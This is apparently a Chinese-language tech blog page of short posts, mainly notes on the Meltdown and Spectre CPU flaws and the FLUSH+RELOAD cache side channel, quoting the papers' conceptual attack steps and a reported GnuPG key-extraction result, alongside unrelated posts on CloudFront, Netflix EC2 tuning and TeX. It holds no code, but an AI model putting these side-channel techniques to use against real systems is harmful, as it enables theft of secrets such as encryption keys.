## 讀書時間：Meltdown 的攻擊方式

Meltdown 的論文可以在「Meltdown (PDF)」這邊看到。這個漏洞在 Intel 的 CPU 上影響最大，而在 AMD 是不受影響的。其他平台有零星的消息，不過不像 Intel 是這十五年來所有的 CPU 都中獎... (從 Pentium 4 以及之後的所有 CPU)

Meltdown 是基於這些前提，而達到記憶體任意位置的 memory dump：

• 支援 µOP 方式的 out-of-order execution 以及當失敗時的 rollback 機制。
• 因為 cache 機制造成的 side channel information leak。
• 在 out-of-order execution 時對記憶體存取的 permission check 失效。

out-of-order execution 在大學時的計算機組織應該都會提到，不過我印象中當時只講「在確認不相干的指令才會有 out-of-order」。而現代 CPU 做的更深入，包括了兩個部份：

• 第一個是 µOP 方式，將每個 assembly 拆成更細的 micro-operation，後面的 out-of-order execution 是對 µOP 做。
• 第二個是可以先執行下去，如果發現搞錯了再 rollback。

Meltdown is some form of race condition between the fetch of a memory address and the corresponding permission check for this address.

On Linux and OS X, this is done via a direct-physical map, i.e., the entire physical memory is directly mapped to a pre-defined virtual address (cf. Figure 2).

Instead of a direct-physical map, Windows maintains a multiple so-called paged pools, non-paged pools, and the system cache. These pools are virtual memory regions in the kernel address space mapping physical pages to virtual addresses which are either required to remain in the memory (non-paged pool) or can be removed from the memory because a copy is already stored on the disk (paged pool). The system cache further contains mappings of all file-backed pages. Combined, these memory pools will typically map a large fraction of the physical memory into the kernel address space of every process.

## CloudFront 東京加到七個 Edge...

Amazon CloudFront announces six new Edge Locations that are now part of its global network. These six new Edge Locations are located in the following cities:

Perth, Australia; Chennai, India; Rio De Janeiro, Brazil; Los Angeles, California; and two additional Edge Locations in Tokyo, Japan.

## Meltdown 與 Spectre 都有用到的 FLUSH+RELOAD

MeltdownSpectre 攻擊裡都有用到的 FLUSH+RELOAD 技巧。這個技巧是出自於 2013 年的「Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack」。當時還因此對 GnuPG 發了一個 CVE-2013-4242

FLUSH+RELOAD 是希望透過 shared memory & cache 得到 side channel information，藉此突破安全機制。

To achieve sharing, the spy mmaps the victim’s executable file into the spy’s virtual address space. As the Linux loader maps executable files into the process when executing them, the spy and the victim share the memory image of the mapped file.

For the cross-VM scenario we used two different hypervisors: VMware ESXi 5.1 on the HP machine and Centos 6.5 with KVM on the Dell machine. In each hypervisor we created two virtual machines, one for the victim and the other for the spy. The virtual machines run CentOS 6.5 Linux. In this scenario, the spy mmaps a copy of the victim’s executable file. Sharing is achieved through the page de-duplication mechanisms of the hypervisors.

• During the first phase, the monitored memory line is flushed from the cache hierarchy.
• The spy, then, waits to allow the victim time to access the memory line before the third phase.
• In the third phase, the spy reloads the memory line, measuring the time to load it.

We demonstrate the efficacy of the FLUSH+RELOAD attack by using it to extract the private encryption keys from a victim program running GnuPG 1.4.13. We tested the attack both between two unrelated processes in a single operating system and between processes running in separate virtual machines. On average, the attack is able to recover 96.7% of the bits of the secret key by observing a single signature or decryption round.

## Intel CEO 做的真不錯 XDDD

On Nov. 29, Brian Krzanich, the CEO of chip giant Intel (NASDAQ:INTC), reported several transactions in Intel stock in a Form 4 filing with the SEC.

Those two transactions left Krzanich with exactly 250,000 shares -- the bare minimum that he's required to hold as CEO.

## 在 TeX 上輸出圍棋棋譜的套件 psgo_emitter

psgo_emitter is a (Windows) console utility to create go diagrams for go life-and-death problems (tsumego).

    \begin{psgopartialboard}{(1,1)(8,6)}
\stone{black}{b}{3}
\stone{black}{d}{3}
\stone{black}{b}{4}
\stone{white}{d}{5}
\stone{white}{g}{2}
\stone{black}{d}{2}
\stone{white}{b}{5}
\stone{white}{c}{4}
\stone{white}{e}{4}
\stone{white}{e}{3}
\stone{white}{e}{2}
\stone{black}{e}{1}
\end{psgopartialboard}

    \begin{psgopartialboard}{(1,1)(8,6)}
\stone{black}{b}{3}
\stone[\marklb{1}]{black}{a}{2}
\stone{black}{d}{3}
\stone{black}{b}{4}
\stone[\marklb{8}]{white}{f}{1}
\stone[\marklb{6}]{white}{d}{1}
\stone{white}{e}{2}
\stone{white}{g}{2}
\stone{black}{d}{2}
\stone{white}{b}{5}
\stone[\marklb{7}]{black}{b}{2}
\stone[\marklb{9}]{black}{a}{1}
\stone{white}{c}{4}
\stone[\marklb{4}]{white}{c}{2}
\stone{white}{e}{4}
\stone[\marklb{5}]{black}{c}{3}
\stone{white}{e}{3}
\stone[\marklb{2}]{white}{b}{1}
\stone{white}{d}{5}
\stone[\marklb{3}]{black}{a}{4}
\stone{black}{e}{1}
\end{psgopartialboard}

## Linus (又) 不爽了... XD

Please talk to management. Because I really see exactly two possibibilities:

- Intel never intends to fix anything

OR

- these workarounds should have a way to disable them.

Which of the two is it?

## Spectre 與 Meltdown 兩套 CPU 的安全漏洞

The Register 發表了「Kernel-memory-leaking Intel processor design flaw forces Linux, Windows redesign」這篇文章，算是頗完整的說明了這次的安全漏洞 (以 IT 新聞媒體標準來看)，引用了蠻多資料並且試著說明問題。

• Variant 1: bounds check bypass (CVE-2017-5753)
• Variant 2: branch target injection (CVE-2017-5715)
• Variant 3: rogue data cache load (CVE-2017-5754)

(提到 Variant 1 的情況) If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU.

KAISER will affect performance for anything that does system calls or interrupts: everything. Just the new instructions (CR3 manipulation) add a few hundred cycles to a syscall or interrupt. Most workloads that we have run show single-digit regressions. 5% is a good round number for what is typical. The worst we have seen is a roughly 30% regression on a loopback networking test that did a ton of syscalls and context switches.

KAISER 後來改名為 KPTI，查資料的時候可以注意一下。

With these VM results so far it's still a far cry from the "30%" performance hit that's been hyped up by some of the Windows publications, etc. It's still highly dependent upon the particular workload and system how much performance may be potentially lost when enabling page table isolation within the kernel.

## Netflix 在 EC2 上調整的參數

Brendan GreggNetflixEC2 上調整的參數整理了出來：「AWS re:Invent 2017: How Netflix Tunes EC2」。

My last talk for 2017 was at AWS re:Invent, on "How Netflix Tunes EC2 Instances for Performance," an updated version of my 2014 talk.

WARNING: These tunables were developed in late 2017, for Ubuntu Xenial instances on EC2.

## 即將出版的 Xdebug 2.6 能觀察 PHP 的 GC 情況了

Xdebug's built-in garbage collection statistics profiler allows you to find out when the PHP internal garbage collector triggers, how many variables it was able to clean up, how long it took, and how how much memory was actually freed.